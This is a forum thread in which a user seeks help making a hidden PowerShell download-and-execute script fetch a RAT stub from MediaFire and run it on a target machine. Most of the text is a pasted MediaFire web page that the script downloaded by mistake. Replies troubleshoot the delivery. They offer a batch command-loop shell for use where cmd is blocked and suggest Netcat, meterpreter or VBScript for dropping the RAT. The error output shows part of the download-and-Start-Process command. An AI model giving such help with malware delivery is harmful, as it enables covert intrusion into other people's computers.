Jump to content

[SOLVED] Powershell Wget + Execute Problem


Haxineer1337
 Share

Recommended Posts

OLD PROBLEM: Problem Solved

The aforementioned problem was actually caused by how the RAT melted itself. Therefore, when I uploaded it, it turned to 0kb and never worked.

NEW PROBLEM: I have a RAT Stub on mediafire (Shared Files)

The powershell wget and execute script runs and the box pops up and shortly closes due to the windowstyle hidden feature. The file successfully downloads to the C drive, but never executes it. I try to execute it manually and it says that "This program is not compatible with the version of windows you're running". This is weird because if I download and execute it manually it works (I make a box pop up), it's just the powershell downloader that screws it up. Can someone help? I'd appreciate it, thanks.

UPDATE: OK, ON MEDIAFIRE THE FILE IS 659KB, BUT THE FILE THE FILE DOWNLOADED WITH POWERSHELL IS ONLY 92.5KB. HELP?!

UPDATE UPDATE: IT SEEMS THAT THE DOWNLOADER IS DOWNLOADING THE WEBPAGE AND NOT THE FILE. HELP?

Code: (Runs Test stub which is suppose to open up a text window):

Start-Process : This command cannot be run due to the error: The specified

executable is not a valid application for this OS platform..

At line:1 char:121

+ ... \testub.exe'); Start-Process C:\testub.exe

Edited by Haxineer1337
Link to comment
Share on other sites

Hmm. If you are using the unmodified code, then PowerShell may not be a part of your path. Try to specify everything through cmd, including the directory to powershell itself. Else you could use CTRL ESC to open the start menu and try the following:

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe Start-Process cmd.exe -Verb runAs 

NOTE: When you try and execute an application with a path that includes a space (e.g. C:\Hello Directory\Hello File.txt) you may need to put the path in double quotes:

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe Start-Process "C:\Windows\System32\cmd.exe" -Verb runAs 

See if that works.

MB60893

Edited by MB60893
Link to comment
Share on other sites

Hmm. If you are using the unmodified code, then PowerShell may not be a part of your path. Try to specify everything through cmd, including the directory to powershell itself. Else you could use CTRL ESC to open the start menu and try the following:

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe Start-Process cmd.exe -Verb runAs 

NOTE: When you try and execute an application with a path that includes a space (e.g. C:\Hello Directory\Hello File.txt) you may need to put the path in double quotes:

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe Start-Process "C:\Windows\System32\cmd.exe" -Verb runAs 

See if that works.

MB60893

I have resolved that problem. Please help me resolve the current problem. Thank you for helping.

Edited by Haxineer1337
Link to comment
Share on other sites

Haxineer1337, what sort of file are you downloading off dropbox. Chrome decects a virus, and I don't know if a program like Microsoft Security Essentials might be blocking the program from running.

Link to comment
Share on other sites

Haxineer1337, what sort of file are you downloading off dropbox. Chrome decects a virus, and I don't know if a program like Microsoft Security Essentials might be blocking the program from running.

It is a RAT stud, and it is identified by lots of antiviruses. It technically just drops a RAT on their computer.

Let me try doing it with something like a text file.

EDIT: UMG IT WORKS WITH THE TEXT FILE. Great, now I can't drop the RAT. Anyone have any ideas?

ALSO POSSIBLE: THE EXE COULD HAVE GOTTEN CORRUPTED

Edited by Haxineer1337
Link to comment
Share on other sites

I tried doing a wget for TeamViewer, which I know should work because I wrote the code and it worked just fine two days ago. I suggest using an ftp, or if you need to you can try and use a duckslurp modification which would allow you to transfer the file off a USB and execute it with the cmd. If cmd is blocked on your target computer, consider writing the following code into a text file, and save as a .bat:

@echo off
break off

:loopcommand:
echo.
set cmd=
set /p cmd=%cd%: 
%cmd%
goto loopcommand

Else you could execute the file with a vb script. It's all up to you, although I'd go the cmd way personally.

Link to comment
Share on other sites

I tried doing a wget for TeamViewer, which I know should work because I wrote the code and it worked just fine two days ago. I suggest using an ftp, or if you need to you can try and use a duckslurp modification which would allow you to transfer the file off a USB and execute it with the cmd. If cmd is blocked on your target computer, consider writing the following code into a text file, and save as a .bat:

@echo off
break off

:loopcommand:
echo.
set cmd=
set /p cmd=%cd%: 
%cmd%
goto loopcommand

Else you could execute the file with a vb script. It's all up to you, although I'd go the cmd way personally.

I've tried setting up a FTP server, but failed horribly. I think I am going to actually use meterpreter, and then upload and execute the RAT.

Link to comment
Share on other sites

OK. Else you could try and transfer the file via NetCat or some other program. You could probably write your own application simply to get the program through a wget like download and execute. Use some simple scripting language like VBScript or Batch. It is really simple to use and I think you might be able to pick it up really quickly.

Link to comment
Share on other sites

OK. Else you could try and transfer the file via NetCat or some other program. You could probably write your own application simply to get the program through a wget like download and execute. Use some simple scripting language like VBScript or Batch. It is really simple to use and I think you might be able to pick it up really quickly.

Ok. I just found out that it never worked. Here's what the text file said:

IT DID NOT DOWNLOAD THE FILE. IT DOWNLOADED THE WEBPAGE. Can someone please help me make a script that actually downloads the file instead of the webpage?! Thanks! Thanks, MB

</spoiler> <!DOCTYPE html> <html lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>Ducky</title> <META NAME="keywords" CONTENT="online storage, free storage, cloud Storage, collaboration, backup file Sharing, share Files, photo backup, photo sharing, ftp replacement, cross platform, remote access, mobile access, send large files, recover files, file versioning, undelete, Windows, PC, Mac, OS X, Linux, iPhone, iPad, Android"/> <META NAME="description" CONTENT="MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere."/> <META NAME="ROBOTS" CONTENT="NOINDEX,FOLLOW"/> <META NAME="GOOGLEBOT" CONTENT="NOINDEX,FOLLOW"/> <META NAME="SLURP" CONTENT="NOINDEX,FOLLOW"/> <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="0"/> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>  <meta property="og:image" content="" /><meta property="twitter:image" content="" />
<meta property="og:title" content="Ducky.txt" />
<meta property="twitter:title" content="Ducky.txt" />
<meta property="og:description" content="MediaFire is a simple to use free service for that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere." />
<meta property="twitter:description" content="MediaFire is a simple to use free service for that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere." />
 <meta property="og:type" content="website"/> <meta property="og:site_name" content="MediaFire"/> <meta property="og:url" content="http://www.mediafire.com/view/8vzt89wef1qnr3n/Ducky.txt"/> <meta property="fb:app_id" content="124578887583575"/>   <meta name="apple-itunes-app" content="app-id=555646196"/>    <link href="https://cdnssl.mediafire.com/css/mfv3_107763.php?ver=nonssl" rel="stylesheet" type="text/css"/> <link href="https://cdnssl.mediafire.com/css/mfv4_107763.php?ver=nonssl&date=2014-01-13" rel="stylesheet" type="text/css"/> <link href="https://cdnssl.mediafire.com/css/fileview.css_107763.php?ver=nonssl" rel="stylesheet" type="text/css" />
 <link href='https://fonts.googleapis.com/css?family=Open+Sans:800,700,400,300' rel='stylesheet' type='text/css'/>  <!--[if lte IE 8]> <link rel="stylesheet" type="text/css" href="https://cdnssl.mediafire.com/css/ie_107763.css?ver=nonssl"/> <![endif]--> <!--[if lt IE 7]> <link rel="stylesheet" type="text/css" href="https://cdnssl.mediafire.com/css/ie6_107763.css?ver=nonssl"/> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="https://cdnssl.mediafire.com/css/ie7_107763.css?ver=nonssl"/> <![endif]-->  <link rel="SHORTCUT ICON" href="/favicon.ico"/> <script type="text/javascript">var acK= true;var aCH='live';var aWJ= false;function asO(e,qv){var vU=qv+': ';if(e.name){vU+='Error name: "'+e.name+'"  ';}if(e.message){vU+='Error message: "'+e.message+'"  ';}Ku(5,vU);};var Iu='Simple File Sharing and Storage'; </script>  <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.js"></script>  <script language="JavaScript" type="text/JavaScript">try{if(typeof jQuery=="undefined"){document.write('<scri'+'pt type="text/javascript" src="https://cdnssl.mediafire.com/js/jquery/1.7.2/jquery.js"></sc'+'ript>');}}catch(e){asO(e,'HDR:jquery_check');} </script>   <style type="text/css"> #statusmessage{position:fixed;top:200px;} </style> <script type="text/javascript">var JS_LoadTime= 107763;window.onload=function(){Cy();}; </script>  <script type="text/javascript">


    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', 'UA-829541-1']);
    _gaq.push(['_setCustomVar',1,'UserType','free']);
    _gaq.push(['_trackPageview']);
    try{
        (function() {
                var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
                ga.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'stats.g.doubleclick.net/dc.js';
                var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
        })();
    }catch(e){
        LogDlError(e, 'HDR:google_analytics');
}
</script>  <script type="text/javascript">var MYF_WIDGET_STORAGE_totalStorage= 10737418240;MYF_WIDGET_STORAGE_usedStorage= 0;MYF_WIDGET_STORAGE_usedStoragePercent=Math.round(Math.min(parseFloat(MYF_WIDGET_STORAGE_usedStorage/MYF_WIDGET_STORAGE_totalStorage),1)*100),aXq= false,aXm= false,aWh="",aXE= 0,aWx= false,aXd='4.50',window.addEventListener('onload',function(){aXa();}); </script>  </head> <body class="filePreview documentPreview liquidLayout time-to-upgrade freeAccount darkTheme">  <div id="statusmessage" name="statusmessage" style="display:none;"> <div style="width:600px;margin:auto;padding:10px;opacity:0.95;"> <div class="statusmessage_wrapper" style="padding:20px;text-align:center;"> <div id="statusmessage_text" name="statusmessage_text"></div> <div id="dismiss_message_div"> Click to dismiss this message </div> </div> </div> </div>  <div id="modal_window_popup" style="display:none" class="popup"> <a href='#' OnClick="bfM('modal_window_popup');return false;" id="modal_window_closer" class="popup-close"></a> <div class="modalMsgWrapper" style=""> <iframe name="modal_msg_iframe" id="modal_msg_iframe" src="https://cdnssl.mediafire.com/blank.html" scrolling="no" frameborder="0" allowTransparency="true"></iframe> </div> </div>  <div id="notify_main" class="msg_default msg_size1" style="display:none;" onclick="Qv(event);" onmouseover="if(!NH&& !NB)OI(4);NH=true;" onmouseout="NH=false;"> <div class="notify_msgwrapper"> <p> <span id="notify_msgtitle_min" class="notify_msgtitle_min">100 Recent Messages</span> <span id="notify_msgtitle" class="notify_msgtitle">Message title goes here</span> <span id="notify_msgbody" class="notify_msgbody">Short paragraph explaining the nature of the message goes here.</span> </p> </div> <div id="notify_msgscroll" class="notify_msgscroll"> <a class="msgscroll_up" href="#" onclick="Pf();return false;"></a> <a class="msgscroll_dn" href="#" onclick="Pe();return false;"></a> <p id="notify_msgnumber" class="msgnumber"></p> </div> </div>   <div class="upgrade_your_browser"> <div class="wrap"> It appears you are using an older browser. For a better experience when using MediaFire, we recommend you <a href="#" style="color:#fff;text-decoration:underline;cursor:pointer;" onclick="LoadIframeLightbox('/dynamic/template_popup.php?page=upgrade_browser',680,300);return false;">upgrade your browser</a>. </div> </div>    <div id="container" class=" nonOwner ">  <div id="helpContainer" class="floatingTabsBox">     <form id="" class="helpForm open" action="" style=""> <div id="tabHelp" class="floatingTab"> <div>Help</div> <span class="indicator-left"></span> </div> <p>Questions? <a href="/help/submit_a_ticket.php" target="_blank">Submit a ticket</a> or <a href="/help/" target="_blank">visit our Help Center</a>.</p> <p class="additionalHelpLinks">Additional help links: <a href="/help/submit_a_ticket.php" target="_blank">Contact Us</a> <a href="/help/help_with_web.php" target="_blank">Help with Web</a> <a href="/help/help_with_mobile.php" target="_blank">Help with Mobile</a> <a href="/help/help_with_desktop.php" target="_blank">Help with Desktop</a> </p> <span>Call us at 1-877-688-0068 to speak to a live representative.</span> <div class="mfFooterSupport"> YOUR SUPPORT CODE: <div id="helpCode" class="help_code_target"></div> </div>  <div class="expandHelpClose" onClick="$('#helpContainer').removeClass('expandHelp');"><span class="indicator-down"></span>CLOSE</div> </form>   </div>  <div id="content_container"> <a name="top"></a> <textarea id="holdtext" style="display:none"></textarea>  <div id="header">       <h2 class="logo cf">  <a href="/" target="_top">MediaFire</a>   </h2>     <div id="logged_in_info" class="login_inprogress"> <div class="dropdown dropdownOnClick ddRight cf">  <a id="loggedin" class="gbtnPrimary prelogin" title="Logged in as "> <span class="smArrowDown"></span> <span id="avatar-icon" class="arrow_tab">  <span><img src="http://www.mediafire.com/images/icons/myfiles/default.png" style="width: 32px; height: 32px" onerror="this.style.display='none';" /></span> </span> </a>  <ul id="loggedin_dropdown">  <li class="ddStaticTxt"> </li>  <li class="ddStaticTxt"><div></div></li>  <li class="ddStaticTxt">  </li>      <li>   <a href="https://www.mediafire.com/view/8vzt89wef1qnr3n/Ducky.txt?ssl=on" title="Turn Secure Encryption On"> SSL <div class="toggle-switch tsSmall"> <div class="ts-slider"> <label class="ts-l">On</label> <div class="ts-knob"></div> <label class="ts-r">Off</label> </div> </div> </a>  </li>   <li> <span class="notificationBubble" style="display:block;">!</span> <a href="javascript:void(0);" style="color:#D85724!important;" OnClick="LoadIframeLightbox('/dynamic/template_popup.php?page=email_validation_lightbox',720,450,false,false,true);">Verify Email</a> </li>    <li class="divider"></li> <li><a href="/" class="ico30folder">My Files</a></li> <li><a href="/#settings" class="ico30settings">Settings</a></li>  <li><a href="/upgrade/" class="ico30upgrade">Upgrade</a></li>  <li><a href="/earnspace/" class="ico30add">Earn free space!</a></li>  <li><a href="#" onclick="LoadIframeLightbox('/templates/upgrade/statistics.html', 720, 390); return false;" class="ico30chart">View Statistics</a></li> <li><a href="/software/" class="ico30mobile">Desktop & Mobile</a></li>  <li><a href="#" class="ico30logout" OnClick="dO();return false;" style="margin-bottom:5px;">Log Out</a></li> </ul> </div>  <div id="notloggedin_wrapper" class="hide"> <div id="notloggedin" class="prelogin"> <ul id="login_signup"> <li class="signup_button"><a href="#" class="gbtnTertiary leftBtn">Sign Up</a></li> <li id="loginTabWrap" class="gbtnTertiary rightBtn"> <div id="headerlogin_tab" class="">Log In<span class="logintab_overlay">Log In</span></div> <div class="loginActivateTW"></div> <div class="loginActivateFB"></div> </li> </ul> </div> </div> </div>  <ul class="nav"> <div class="gbtnPrimary ico30help" title="Click for help" onClick="$('.floatingTab').click();fRequestHelpCode();">Help</div>                 </ul>   <div id="main_login" name="main_login" class="main_login">  <div class="tabs"> <ul class="cf"> <li id="login_tab_mediafire" onclick="if(UserLogin==0)vQ(1);return false;" title="MediaFire Login" class="current" ><div></div></li> <li id="login_tab_facebook" href="javascript:void(0);" onclick="if(!wM)vQ(2);return false;" title="Login Using Facebook" ><div></div></li> <li id="login_tab_twitter" href="javascript:void(0);" onclick="if(!wL)vQ(3);return false;" title="Login Using Twitter" ><div></div></li> <li id="login_close" href="javascript:void(0);" class="close" onclick="akT();"></li> </ul>  <div id="socialnetworks_support" class="login_hide"> <div class="login_social_inner"> <h2 class="soc_heading">Powerful for business. Simple for everyone.</h2> </div> </div>  <div id="login_mediafire">  <div style="display:none;;padding:82px 0;" id="login_spinner"> <div style="text-align:center"> <p style="margin:20px"><img src="https://cdnssl.mediafire.com/images/icons/ajax-loader-grey_round.gif"></p> <p>Logging in…</p> </div> </div>  <div id="login_form"> <p class="soc_error" style="display:none;margin:10px 20px 10px 0;padding:5px;" id="login_penalty_message"></p> <form name="form_login1" id="form_login1" method="post" action="/dynamic/client_login/mediafire.php&use_doc_domain=true" target="userwork"> <fieldset> <label>Your Email Address:</label> <input type="text" name="login_email" id="login_email"/> <label>Password:</label> <input type="password" name="login_pass" id="login_pass" autocomplete="off" maxlength="30"/> <a href="/lost_password.php" class="forgot-pwd">Forgot your password?</a> <input type="checkbox" name="login_remember" id="login_remember" checked/><p id="login_remember_p">Remember me on this computer</p> <input id="submit_login" type="submit" name="submit_login" value="Log in to MediaFire" class="gbtnTertiary"/> <div id="login_secure_header_link"> <a href="https://www.mediafire.com/ssl_login.php?type=login" id="login_ssl_btn" class="gbtnPrimary ico30lock">Log in using SSL encryption</a> </div> </fieldset> </form> </div> </div>  <div id="login_facebook" class="login_hide"> <div class="login_social_inner"> <p class="soc_heading">Use your Facebook account to<br/>log in to MediaFire.</p> <div class="soc_login_block"> <div style="display:none;"><input id="facebook_app_id" type="hidden" value="124578887583575"/></div> <div id="facebook_login_0"> <div style="text-align:center;"> <p style="margin:20px 20px 0;"> <img src="https://cdnssl.mediafire.com/images/icons/ajax-loader-grey_round.gif"> </p> <p> Please wait… </p> </div> </div> <div style="display:none;" id="facebook_login_1"> <div style="text-align:center;margin:8px 0 0 0;"> <a href="#" onclick="javascript:mI=yF('facebook',function(){wP(1);});vZ('email');return false;"><img src="https://cdnssl.mediafire.com/images/buttons/btn_facebook_connect.png"></a> </div> <div class="headerSocialButton"> <span>Like us on Facebook:</span> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FMediaFire&send=false&layout=button_count&width=180&show_faces=false&action=like&colorscheme=light&font&height=80" scrolling="no" frameborder="0" allowTransparency="true"></iframe> </div> <div class="soc_perms_option" style="display:none;"> <span class="soc_options_heading">Options:</span> <div style="border-bottom:1px solid #D7D9DB;"> <input type="checkbox" name="fb_email_allow" id="fb_email_allow" checked="checked"/> <p>Enable MediaFire to get my email address from Facebook. (recommended)</p> </div> <div> <input type="checkbox" name="fb_publish_stream_allow" id="fb_publish_stream_allow" checked="checked"/> <p>Allow me to post to my Facebook Wall from MediaFire.</p> </div> </div> </div> <div style="display:none;" id="facebook_login_2"> <div style="text-align:center"> <p style="margin:20px 20px 0;"> <img src="https://cdnssl.mediafire.com/images/icons/ajax-loader-grey_round.gif"> </p> <p>Logging in…</p> <a href="#" class="btn secondary" style="margin-top:20px;">Cancel</a> </div> </div> <div style="display:none;" id="facebook_login_3"> <p class="soc_error" style="display:none;" id="fb_error_step3"></p> <form action="/dynamic/client_login/facebook.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <p class="soc_display_email" id="fb_step3_email"></p> <label>Password:</label> <input type="password" autocomplete="off" name="mf_password" id="mf_password"/> <a href="/lost_password.php" class="forgot-pwd">Forgot your password?</a> <div> <input type="submit" value="Connect" style="margin-top:10px;margin-bottom:20px;" class="gbtnTertiary"/> </div> </form> </div> <div style="display:none;" id="facebook_login_4"> <div class="soc_toggler"> <a href="#" class="use_fbemail_active inset-box">Use My Facebook Email</a> <a href="#" onclick="wP(5);return false;" class="use_mfemail_inactive secondary-btn">Link Using MediaFire Account</a> </div> <div id="create_new_mf"> <p class="soc_error" style="display:none;" id="fb_error_step4">This gets filled if something bad happened.</p> <form action="/dynamic/client_login/facebook.php" target="userwork" method="POST" id="use_fb_email_form" onsubmit="wP(2);return true;"> <label>Password:</label> <input type="password" autocomplete="off" name="use_fb_email_pass" id="use_fb_email_pass"/> <label>Confirm Password:</label> <input type="password" autocomplete="off" name="use_fb_email_pass2" id="use_fb_email_pass2"/> <div> <input type="submit" value="Use Facebook Email" style="margin-top:20px;margin-bottom:20px;" class="gbtnTertiary"/> </div> </form> </div> </div> <div style="display:none;" id="facebook_login_5"> <div class="soc_toggler"> <a href="#" onclick="wP(4);return false;" class="use_fbemail_inactive secondary-btn">Use My Facebook Email</a> <a href="#" class="use_mfemail_active inset-box">Link Using MediaFire Account</a> </div> <div id="link_another_mf"> <p class="soc_error" style="display:none;" id="fb_error_step5"></p> <form action="/dynamic/client_login/facebook.php" target="userwork" method="POST" id="link_mf_acct_form" onsubmit="wP(2);return true;"> <label>Your MediaFire Email:</label> <input type="text" name="mf2_email" id="mf2_email"> <label>MediaFire Password:</label> <input type="password" autocomplete="off" name="mf2_password" id="mf2_password"> <a href="/lost_password.php" class="forgot-pwd">Forgot your password?</a> <div> <input type="submit" value="Connect" style="margin-top:6px;margin-bottom:20px;" class="gbtnTertiary"/> </div> </form> </div> </div> <div style="display:none;" id="facebook_login_6"> <p class="soc_p_center">You are logged in with Facebook,<br/>but you did not allow your email.</p> <p class="soc_p_center"><a href="#" onclick="javascript:vZ('email')"><img src="https://cdnssl.mediafire.com/images/buttons/btn_facebook_allowemail.png"></a></p> <p class="soc_p_center">or</p> <a href="/register.php" id="btn_fb_create_mfaccount" class="primary-btn">Create MediaFire Account</a> </div> <div style="display:none;"> <form action="/dynamic/client_login/facebook.php" target="userwork" method="POST" id="facebook_login_form" name="facebook_login_form" style="margin:0px;"> <input type="hidden" name="fb_login_action" id="fb_login_action"/> <input type="hidden" name="fb_login_data1" id="fb_login_data1"/> <input type="hidden" name="fb_login_data2" id="fb_login_data2"/> </form> </div>   </div> </div> </div>  <div id="login_twitter" class="login_hide"> <div class="login_social_inner"> <p class="soc_heading">Use your Twitter account to<br/>login to MediaFire.</p> <div class="soc_login_block"> <div id="twitter_login_0"> <div style="text-align:center"> <p style="margin:20px"> <img src="https://cdnssl.mediafire.com/images/icons/ajax-loader-grey_round.gif"> </p> <p> Please Wait… </p> </div> </div> <div style="display:none;" id="twitter_login_1"> <div class="twitter_login_gfx"> <a href="#" onclick="mI=yF('twitter',function(){wX(1);});wI();wX(2);return false;" id="twitter_login_url"><img src="https://cdnssl.mediafire.com/images/buttons/btn_twitter_connect.png" alt="Sign in with Twitter"/></a> </div> <div class="headerSocialButton"> </div> </div> <div style="display:none;" id="twitter_login_2"> <div style="text-align:center"> <p style="margin:20px"> <img src="https://cdnssl.mediafire.com/images/icons/ajax-loader-grey_round.gif"> </p> <p> Logging in… </p> </div> </div> <div style="display:none;" id="twitter_login_3"> <div class="soc_toggler"> <a href="#" class="use_twemail_active inset-box">Use Twitter Email</a> <a href="#" onclick="wX(4);return false;" class="use_mfemail_inactive secondary-btn">Use MediaFire Email</a> </div> <div id="create_new_tw"> <p class="soc_error" style="display:none;" id="tw_error_step3"></p> <form action="/dynamic/client_login/twitter.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <label>Twitter Email:</label> <input type="text" name="use_tw_email" id="use_tw_email" value=""/> <label>New password:</label> <input type="password" autocomplete="off" name="use_tw_email_pass" id="use_tw_email_pass"/> <label>Confirm Password:</label> <input type="password" autocomplete="off" name="use_tw_email_pass2" id="use_tw_email_pass2"/> <div> <input type="submit" value="Use Twitter Email" style="margin-top:20px;margin-bottom:20px;" class="gbtnTertiary"/> </div> </form> </div> </div> <div style="display:none;" id="twitter_login_4"> <div class="soc_toggler"> <a href="#" onclick="wX(3);return false;" class="use_twemail_inactive secondary-btn">Use Twitter Email</a> <a href="#" class="use_mfemail_active inset-box">Use MediaFire Email</a> </div> <div id="link_another_tw"> <p class="soc_error" style="display:none;" id="tw_error_step4"></p> <form action="/dynamic/client_login/twitter.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <label>Your MediaFire Email:</label> <input type="text" name="mf2_email" id="mf2_email" value=""/> <label>MediaFire Password:</label> <input type="password" autocomplete="off" name="mf2_password" id="mf2_password"/> <a href="/lost_password.php" class="forgot-pwd">Forgot your password?</a> <div> <input id="btn_fb_authenticate" type="submit" value="Connect" style="margin-top:10px;margin-bottom:20px;" class="gbtnTertiary"/> </div> </form> </div> </div> <div style="display:none;"> <form action="/dynamic/client_login/twitter.php" target="userwork" method="POST" id="twitter_login_form" name="twitter_login_form" style="margin:0px;"> <input type="hidden" name="tw_login_action" id="tw_login_action"/> <input type="hidden" name="tw_login_data1" id="tw_login_data1"/> <input type="hidden" name="tw_login_data2" id="tw_login_data2"/> </form> </div>  </div> </div> </div> </div>  </div>     <div class="searchLogo"><span class="searachLogoFlame"></span>Search</div> <a class="gbtnSecondary upgrade_acct" href="/dynamic/ct.php?link=flex_head_up_btn&url=/upgrade/" title="Upgrade Now!" style="margin-top:17px;">Upgrade</a> <a class="gbtnSecondary upgrade_discount" href="/dynamic/ct.php?link=flex_head_up_btn50&url=/upgrade/" style="margin-top:17px;">50% OFF!<span class="tooltip point-up alt">50% off of Pro and Business. Upgrade now!</span></a>   <div id="headerControlsMyFiles" class="headerControls">  <div class="filenameShare"> <div id="fileDetails"> <div class="title"> <a href="/" class="customLogoShared"><img src=""/></a> <span id="folder_name" title=""></span> <span id="folder_author" title="shared by "sparkydude2""> shared by "sparkydude2"</span> </div> </div> </div>   <div class="headerControlsBtns hcMain">  <div id="uploadMenu" class="dropdown dropdownOnClick" style="float:left;"> <a href="javascript:void(0);" class="gbtnTertiary ico30upload" title="Upload Files"><span>UPLOAD</span></a> <ul class="dropdown"> <li id="upload_to_current_folder"> <a href="javascript:void(0);" class="show_uploader"> <span class="addMenu aMcomp"></span>From computer </a> <span class="shortcut_key"> U <span class="tooltip alt point-left">Press U on your keyboard to upload files.</span> </span> </li> <li><a id="upload_from_web"><span class="addMenu aMweb"></span>From the web</a></li> </ul> </div> <a id="new_folder_trigger" href="javascript:void(0);" class="folder_mainaction gbtnTertiary ico30addFolder" style="float:left;" title="Create Folders (You can also press the [N] key on your keyboard.)"></a>  <div id="createMenu" data-command="text_file" class="gbtnTertiary ico30addFile" title="Create a Text File"></div>    </div>  <div class="headerTrashBtns"> <a id="trash_restoreAll" href="javascript:void(0);" class="gbtnPrimary ico30rotateCCW" title="Restore all files"><span>Restore All</span></a> <a id="trash_deleteAll" href="javascript:void(0);" class="gbtnTertiary ico30trash" title="Delete all files"><span>Empty</span></a> </div>  <div class="headerControlsBtns">  <div class="cf" style="width:97px;height:1px;"> <div class="gbtnPrimary ico30thumbnail rightBtn" id="viewtab2" title="Thumbnail" style="width:30px;"></div> <div class="gbtnPrimary ico30list leftBtn changeview_active" id="viewtab1" title="List" style="width:30px;"></div> </div>   <div id="shareMenu" class="" style="float:right"> <a id="current_folder_download" class="gbtnSecondary ico30download" data-command="download-folder" title="Download Folder"></a> <a id="current_folder_share" class="gbtnTertiary ico30share" data-command="share-folder" title="Share Folder"></a> <a id="addfolder_to_account" class="gbtnTertiary ico30saveToAccount" data-command="add-folder" title="Follow Folder">Follow</a> </div> <span class="clearSearch" name="search_delete_button1" id="search_delete_button1"> <img title="Clear search" alt="Clear search" src="/images/backgrounds/newMyfiles/exitSearch.png"> </span>  <div class="searchWrap"> <div class="searchField"> <a class="gbtnPrimary ico30search" title="Search" href="#"></a> <div id="searchProgress" class="hide"></div> <input id="search-text" type="text" value="" placeholder="Search" style="float:right;"> <span class="indicator-down"></span> <div id="myfiles_filtercontrol" class="ddRight dropdown dropdownOnClick filterAll" style="float:left;"> <a id="currentFilterlink">All Types</a> <ul class="dropdown"> <li data-command="all">All Types</li> <li data-command="folders">Folders only</li> <li data-command="files">Files only</li> <li data-command="image">Images</li> <li data-command="video">Video</li> <li data-command="audio">Audio</li> <li data-command="document">Documents</li> <li data-command="spreadsheet">Spreadsheets</li> <li data-command="presentation">Presentations</li> <li data-command="development">Development</li> <li data-command="public">Public Items</li> <li data-command="private">Private Items</li> </ul> </div> </div> <div class="searchRadioButtons"><label><input type="radio" name="searchscope" id="searchscope-folder" value="folder">This Folder</label>  <label><input type="radio" name="searchscope" id="searchscope-global" value="global" checked>All Folders</label></div> <p class="minTxt">3 characters<br/>minimum</p> </div> </div> </div>  <div id="headerControlsImageView" class="headerControls">  <div class="filenameShare">  <div id="image_filename_details"> <span class="title"> <a href="/" class="customLogoShared"><img src=""/></a> <a onclick="aQn()"> <span id="image_filename"></span> <span class="fileRenameIndicator"></span> </a> </span> <span id="image_author"></span> </div> <input id="new_image_filename" type="text"/> </div>  <div class="headerControlsBtns"> <div id="imgControlGroup">  <div class="galleryControls">  <div class="IV_main_nav-download-gallery gbtnAlt ico30download" title="Download gallery"><span>Download</span></div>  <div class="IV_main_nav-share-gallery gbtnAlt ico30share" title="Share gallery"><span>Share</span></div>  <div class="IV_main_nav-add-gallery gbtnAlt ico30saveToAccount non-owner-only"><span>Follow</span></div> <div class="IV_main_nav-unfollow-gallery ico30following gbtnAlt non-owner-only"><span class="followingTxt">Following</span><span class="unfollowHover">Unfollow</span></div> </div>  <div class="fullviewControls">  <a href="javascript:void(0)" target="_blank" class="IV_main_nav-download-image gbtnAlt ico30download" title="Download image"><span>Download</span></a>  <div class="IV_main_nav-share-image gbtnAlt ico30share" title="Share image"><span>Share</span></div>  <div class="IV_main_nav-add-image gbtnAlt ico30saveToAccount non-owner-only"><span>Follow</span></div> <div class="IV_main_nav-unfollow-image ico30following gbtnAlt non-owner-only"><span class="followingTxt">Following</span><span class="unfollowHover">Unfollow</span></div> </div>  <div class="filmstripControls">  <div class="dropdown dropdownOnClick ddRight"> <a class="gbtnAlt ico30download " title="Download"><span>Download</span></a> <ul> <li class="IV_main_nav-download-image" data-cmd="download-single"><a href="javascript:void(0)" target="_blank">Download Image</a></li> <li class="IV_main_nav-download-gallery" data-cmd="download-gallery">Download Gallery</li> </ul> </div>  <div class="dropdown dropdownOnClick ddRight"> <a class="gbtnAlt ico30share " title="Share">Share</a> <ul> <li class="IV_main_nav-share-image" data-cmd="download-single">Share Image</li> <li class="IV_main_nav-share-gallery" data-cmd="download-gallery">Share Gallery</li> <li class="divider"></li> <li><a href="/rss.php?key=" target="_blank">Subscribe to Folder</a></li> </ul> </div>  <div class="IV_main_nav-add-image gbtnAlt ico30saveToAccount non-owner-only"><span>Follow</span></div> <div class="IV_main_nav-unfollow-image ico30following gbtnAlt non-owner-only"><span class="followingTxt">Following</span><span class="unfollowHover">Unfollow</span></div> </div>  <div class="previewSelectionControls">  <div class="IV_main_nav-download-selection gbtnAlt ico30download" title="Download selected images"><span>Download</span></div>  <div class="IV_main_nav-share-selection gbtnAlt ico30share" title="Share selected images"><span>Share</span></div>  <div class="IV_main_nav-add-selection gbtnAlt ico30saveToAccount non-owner-only"><span>Follow</span></div> <div class="ico30following gbtnAlt non-owner-only"><span class="followingTxt">Following</span><span class="unfollowHover">Unfollow</span></div>  <div class="selectionBubble" title="12 items selected">12</div> </div> </div> </div> </div>  <div id="headerControlsMediaView" class="headerControls">  <div class="filenameShare"> <div id="PLAY_fileDetails"> <span class="title"> <a href="/" class="customLogoShared"><img src=""/></a> <a onclick="PLAY_fRenameFile();"> <span id="PLAY_fileName" title="Ducky.txt">Ducky.txt</span> <span class="fileRenameIndicator"></span> </a> </span><span 